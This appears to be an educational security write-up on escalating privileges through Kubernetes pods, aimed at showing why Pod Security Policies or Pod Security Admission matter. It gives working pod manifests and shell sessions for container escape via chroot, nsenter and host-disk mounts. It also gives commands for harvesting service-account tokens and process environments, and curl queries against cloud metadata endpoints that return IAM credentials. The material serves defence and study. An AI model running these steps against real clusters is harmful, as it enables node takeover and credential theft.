Description
Let's look at some common and simple ways to escalate privileges using K8s pods. Almost all of these weaknesses can be mitigated using pod security policies.
Prerequisites
- Access to a K8s cluster
- Permissions to create a pod and exec into it
- No Pod Security Policies enforcement, either by K8s' native PodSecurityPolicy or by a third-party tool like Gatekeeper
Back to Basics
As you might know, pods are nothing but a group of Linux processes that are isolated using two features of the Linux kernel: namespaces and cgroups. Namespaces (HostName, PID, File System, Network, IPC) give the process a "view" that hides everything outside of those namespaces, while cgroups limit the resources (CPU, RAM, block and network I/O) that the process can use.
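Both mechanisms can be inspected through /proc on any Linux host or inside any container. The following is a minimal sketch; the helper name show_isolation is made up for this example, and it assumes a Linux /proc filesystem is available.

```shell
# Print the namespaces and cgroup membership of a process (hypothetical helper).
# Usage: show_isolation [PID]   (defaults to the current shell)
show_isolation() {
  pid=${1:-$$}
  # Each entry under /proc/<pid>/ns is a symlink such as "pid:[4026531836]";
  # two processes share a namespace when these identifiers match.
  for ns in /proc/"$pid"/ns/*; do
    printf '%s -> %s\n' "${ns##*/}" "$(readlink "$ns")"
  done
  # /proc/<pid>/cgroup lists the cgroup(s) the process belongs to.
  cat /proc/"$pid"/cgroup
}
```

Running show_isolation inside an ordinary pod and again on the node should print different namespace identifiers; the attacks below work by removing one or more of those differences.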
Let's get started
K8s generally uses RBAC for authorization. Even when a user is not allowed to create a pod directly, there are at least seven other ways for them to create one, using built-in controllers: Job, CronJob, ReplicationController (not very common nowadays), ReplicaSet, Deployment, DaemonSet and StatefulSet, along with any number of custom controllers. So, if you want to prevent your users from creating pods, look out for all of the different ways your cluster provides for creating them.
For our case, let's assume we have the rights to create pod resources and to exec into them.
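One way to see which of these routes are open to the current user is to ask the API server with kubectl auth can-i. This is only a sketch: the helper name check_pod_creators is hypothetical, it covers the built-in resources only (custom controllers are not included), and it assumes kubectl is already configured for the target cluster.

```shell
# Ask the API server which pod-creating resources the current user may create.
# The helper name is hypothetical; `kubectl auth can-i` is the real subcommand.
check_pod_creators() {
  for resource in pods jobs cronjobs replicationcontrollers replicasets \
                  deployments daemonsets statefulsets; do
    # can-i prints "yes" or "no" and exits non-zero on "no", so capture the text.
    answer=$(kubectl auth can-i create "$resource" 2>/dev/null)
    printf '%-24s %s\n' "$resource" "${answer:-unknown}"
  done
}
```

Calling check_pod_creators prints one line per resource; any "yes" is a path to running a pod.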
Modes
- privileged - A privileged container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. This is useful for containers that want to use Linux capabilities like manipulating the network stack and accessing devices.
- hostPID
- hostNetwork
- hostIPC
- hostPath
Attack 1 (Everything Allowed)
You can exec into the pod, mount the host's root filesystem and chroot into it, effectively becoming root on the host running your pod. If it's a control-plane node, you can read secrets directly from etcd or use the credentials of other privileged control-plane components.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF
kubectl exec -it everything-allowed -- bash
root@minikube:/# docker ps
bash: docker: command not found
root@minikube:/# chroot host
sh-5.0# docker ps | head -n2
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f3d3252343be ubuntu "/bin/sh -c -- 'whil…" 2 minutes ago Up 2 minutes k8s_everything-allowed_everything-allowed_default_89e48ca1-97e6-49a5-a51c-325c95a916eb_0
Attack 2 (Privileged and HostPID)
privileged breaks down most of the walls that container isolation provides, and with hostPID you can see and enter the namespaces of any process running on the host.
How
Let's nsenter into the init process's namespaces (from there onwards we have the same access as with Attack 1 (Everything Allowed)).
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
EOF
kubectl exec -it priv-and-hostpid -- bash
bash-5.0# docker ps | head -n2
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c050527a7218 ubuntu "nsenter --target 1 …" 3 minutes ago Up 3 minutes k8s_priv-and-hostpid_priv-and-hostpid_default_267457b6-97c4-4d5f-bcec-d165a425f2fe_0
bash-5.0# cat /var/lib/kubelet/config.yaml
apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
  anonymous:
    enabled: false
  webhook:
    cacheTTL: 0s
    enabled: true
  x509:
    clientCAFile: /var/lib/minikube/certs/ca.crt
. . . . . .
Attack 3 (Privileged Only)
As in the first attack, privileged mode grants access to the node's devices, which includes the device nodes under /dev. A host disk can therefore be mounted inside the pod (although this won't give a full view of the host filesystem as in Attack 1).
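Before mounting anything you need to know which block devices exist. A rough sketch of one way to enumerate them from inside the pod is shown here; the helper name host_block_devices is hypothetical, and it assumes the usual /proc/partitions layout (a header line, a blank line, then one row per device).

```shell
# List block devices visible to the container, from a /proc/partitions style table.
# Usage: host_block_devices [FILE]   (defaults to /proc/partitions)
host_block_devices() {
  # Rows after the header look like: "major minor #blocks name".
  awk 'NR > 2 && NF == 4 { print "/dev/" $4 }' "${1:-/proc/partitions}"
}
```

In a privileged pod the printed paths exist under /dev and are candidates for mount; in an unprivileged pod the device nodes are normally missing, so the mount step is not possible.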
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: priv-pod
spec:
  containers:
  - name: priv-pod
    image: ubuntu
    securityContext:
      privileged: true
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
minikube ssh
                         _             _
            _         _ ( )           ( )
  ___ ___  (_)  ___  (_)| |/')  _   _ | |_      __
/' _ ` _ `\| |/' _ `\| || , <  ( ) ( )| '_`\  /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )(  ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)
$ df
Filesystem 1K-blocks Used Available Use% Mounted on
tmpfs 7345880 638328 6707552 9% /
. . . . . . . . .
tmpfs 4081044 8 4081036 1% /tmp
/dev/vda1 136554284 37411016 91262620 30% /mnt/vda1
. . . . . . . .
kubectl exec -it priv-pod -- bash
root@priv-pod:/# mkdir /tmp/host-fs
root@priv-pod:/# mount /dev/vda1 /tmp/host-fs/
root@priv-pod:/# cd /tmp/host-fs/
root@priv-pod:/tmp/host-fs# ls
data hostpath-provisioner hostpath_pv lost+found var
root@priv-pod:/tmp/host-fs# ls var/lib/docker/ # also var/lib/kubelet
buildkit containerd containers image network overlay2 plugins runtimes swarm tmp trust volumes
Attack 4 (HostPath Only)
If the administrators have not limited what you can mount, you can mount the host's / into your pod, giving you read/write access to the host's filesystem.
- You can search for a kubeconfig file and might get a cluster-admin config file
- You can search for tokens in /var/lib/kubelet/pods/ - look for tokens that might give access to secrets in kube-system or maybe have the cluster-admin role
- You can add your SSH key to the host
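The token search can be sketched with find. The helper name find_sa_tokens is hypothetical, and the default path assumes the host's / is mounted at /host, as in the pod spec used for this attack.

```shell
# Search a mounted host filesystem for service account token files.
# Usage: find_sa_tokens [DIR]   (defaults to the kubelet pods dir under /host)
find_sa_tokens() {
  # Token volumes expose a file (or symlink) literally named "token".
  find "${1:-/host/var/lib/kubelet/pods}" -name token 2>/dev/null
}
```

Each path printed belongs to some pod on the node; what a given token can do depends on the RBAC bindings of its service account.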
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-exec-pod
spec:
  containers:
  - name: hostpath
    image: ubuntu
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF
kubectl exec -it hostpath-exec-pod -- bash
root@hostpath-exec-pod:/# cd /host/var/lib/kubelet/pods/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods# cd <pod-id>/volumes/kubernetes.io~secret/default-token-w8dkr/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods/. . .# ls -al
total 4
drwxrwxrwt 3 root root 140 Mar 22 04:31 .
drwxr-xr-x 3 root root 4096 Mar 22 04:31 ..
drwxr-xr-x 2 root root 100 Mar 22 04:31 ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root 31 Mar 22 04:31 ..data -> ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root 13 Mar 22 04:31 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Mar 22 04:31 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Mar 22 04:31 token -> ..data/token
Attack 5 (HostPID only)
With only hostPID, you can:
- View processes on the host - running ps within the pod lists all the processes running on the host (including processes in other pods)
- View the environment variables for each pod on the host (process UIDs should match) - you can read the /proc/[PID]/environ file for each process running on the host.
- View the file descriptors for each pod on the host - you can read /proc/[PID]/fd/[X] for each process running on the host.
- Kill processes - you can also kill any process on the node (presenting a denial-of-service risk)
You might get lucky and find secrets, tokens, etc. in the output of ps or in env vars.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpid-pod
spec:
  hostPID: true
  containers:
  - name: hostpid-pod
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
kubectl exec -it hostpid-pod -- bash
root@hostpid-pod:/# ps aux
. . . <removed for brevity> . . .
root 5828 0.0 0.1 710940 8512 ? Sl 03:34 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 25374a04ffcc777d5b0601a3af
root 5849 0.3 0.4 747660 38376 ? Ssl 03:34 0:31 /coredns -conf /etc/coredns/Corefile
root 3348 1.5 0.9 10612728 74544 ? Ssl 03:33 2:17 etcd --advertise-client-urls=https://192.168.64.3:2379 --cert-file=/var/lib/minikube/certs/etcd/server.crt --client-cert-auth=true --data-dir=/var/lib/minikube/etcd --initial-advertise-peer-urls=https://192.168.64.3:2380 --initial-cluster=minikube=https://192.168.64.3:2380 --key-file=/var/lib/minikube/certs/etcd/server.key
. . . . <removed for brevity> . . .
root@hostpid-pod:/# cat /proc/3348/environ
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=minikubeSSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crtHOME=/root
You can only read environ for processes that share the same UID as your pod. To read the environ file of a process with a different UID (say 987), run the pod with runAsUser set to that UID.
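The entries in /proc/[PID]/environ are separated by NUL bytes, which is why plain cat prints them run together. A small sketch that prints one variable per line follows; the helper name show_environ is made up for this example.

```shell
# Print the environment of a process, one variable per line (hypothetical helper).
# Usage: show_environ [PID]   (defaults to the current shell)
show_environ() {
  # Translate the NUL separators into newlines to make the output readable.
  tr '\0' '\n' < /proc/"${1:-$$}"/environ
}
```

For the etcd process above this would be show_environ 3348, subject to the same UID restriction.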
Attack 6 (HostNetwork only)
With only hostNetwork set to true, you can't get privileged code execution on the host directly. But there are still some things you can look for:
- Traffic sniffing - You can sniff traffic using tools like tcpdump and might find some secrets/tokens being sent unencrypted.
- Access services bound to localhost - You can access services listening only on the loopback address.
- Bypass network policy - If you set hostNetwork: true, your pod won't be restricted by a network policy applied to a namespace or pod (because your pod isn't bound to pod networking).
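To find services bound to localhost without installing extra tools, the kernel's socket table can be read directly. This is a sketch under a few assumptions: the helper name loopback_listeners is hypothetical, only IPv4 is covered (IPv6 sockets live in /proc/net/tcp6), and the address 0100007F is 127.0.0.1 as written on a little-endian host.

```shell
# List TCP ports listening on 127.0.0.1, read from a /proc/net/tcp style table.
# Usage: loopback_listeners [FILE]   (defaults to /proc/net/tcp)
loopback_listeners() {
  # Column 2 is the local address as HEXIP:HEXPORT; column 4 is the socket
  # state, where 0A means LISTEN.
  awk '$4 == "0A" && $2 ~ /^0100007F:/ { split($2, a, ":"); print a[2] }' \
    "${1:-/proc/net/tcp}" |
  while read -r hexport; do
    # Convert the hexadecimal port to decimal.
    printf '%d\n' "$((0x$hexport))"
  done
}
```

Run inside a hostNetwork pod, loopback_listeners reports the node's loopback-only ports, which can then be probed with curl or similar.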
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostnetwork-pod
spec:
  hostNetwork: true
  containers:
  - name: hostnetwork
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
Attack 7 (HostIPC only)
Not much can be done here. You'll be able to read/write the same files/mechanisms that other processes on the host use for IPC (e.g. /dev/shm). You should also check the other IPC mechanisms with ipcs and see if anything is written there.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostipc-pod
spec:
  hostIPC: true
  containers:
  - name: hostipc
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
minikube ssh
                         _             _
            _         _ ( )           ( )
  ___ ___  (_)  ___  (_)| |/')  _   _ | |_      __
/' _ ` _ `\| |/' _ `\| || , <  ( ) ( )| '_`\  /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )(  ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)
$ echo "secretpassword=usethissecret" > /dev/shm/secretpassword.txt
kubectl exec -it hostipc-pod -- bash
root@hostipc-pod:/# cat /dev/shm/secretpassword.txt
secretpassword=usethissecret
root@hostipc-pod:/# ipcs -a
------ Message Queues --------
key msqid owner perms used-bytes messages
------ Shared Memory Segments --------
key shmid owner perms bytes nattch status
------ Semaphore Arrays --------
key semid owner perms nsems
Attack 8 (Nothing Allowed)
- If nodes are part of a cloud environment, you can check for the metadata service (you might find creds for the cloud provider)
# AWS
curl http://169.254.169.254/latest/meta-data
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# GCP
curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/'
curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/
# Azure (the metadata service requires an api-version query parameter)
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F"
- Overly permissive service account: By default, the default SA of a namespace is mounted into a pod. If that SA is overly permissive, you can use it to further escalate your permissions in the cluster.
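A quick way to test how permissive the mounted service account is would be to call the API server with its token. The sketch below tries to list secrets in the pod's own namespace; the helper name list_namespace_secrets is hypothetical, the mount path is the standard location for service account credentials, and it assumes curl is available in the image.

```shell
# Use the pod's mounted service account to list secrets in its own namespace.
# SA_DIR is the standard mount path; the helper name is hypothetical.
SA_DIR=${SA_DIR:-/var/run/secrets/kubernetes.io/serviceaccount}

list_namespace_secrets() {
  token=$(cat "$SA_DIR/token")
  namespace=$(cat "$SA_DIR/namespace")
  # KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT are set by Kubernetes
  # inside pods and point at the API server.
  curl --silent --cacert "$SA_DIR/ca.crt" \
    -H "Authorization: Bearer $token" \
    "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/api/v1/namespaces/${namespace}/secrets"
}
```

A JSON list of secrets means the service account is over-privileged; a 403 Forbidden status object means this particular permission is not granted.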
Conclusion
I just wanted to show how easy it is to gain unauthorized access to the underlying nodes or the cluster itself in the absence of proper security checks.
All of the above attacks (except Attack 8) can be mitigated by using PodSecurityPolicies. As of K8s 1.21, PodSecurityPolicy is deprecated, and the Pod Security Admission controller (in beta as of K8s 1.23) should be used instead.
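With Pod Security Admission, enforcement is switched on per namespace through a label. A minimal sketch follows; the helper name enforce_pod_security is hypothetical, and the choice of baseline as the default level is an assumption made here because that level rejects privileged containers, host namespaces and hostPath volumes, which are the settings used in Attacks 1 to 7.

```shell
# Label a namespace so Pod Security Admission rejects pods above the given level.
# The helper name is hypothetical; the label key is the one defined by Kubernetes.
# Usage: enforce_pod_security NAMESPACE [LEVEL]
enforce_pod_security() {
  namespace=$1
  level=${2:-baseline}   # one of: privileged, baseline, restricted
  kubectl label --overwrite namespace "$namespace" \
    "pod-security.kubernetes.io/enforce=$level"
}
```

For example, enforce_pod_security default labels the default namespace; re-applying the pod specs from the attacks above should then be rejected at admission time.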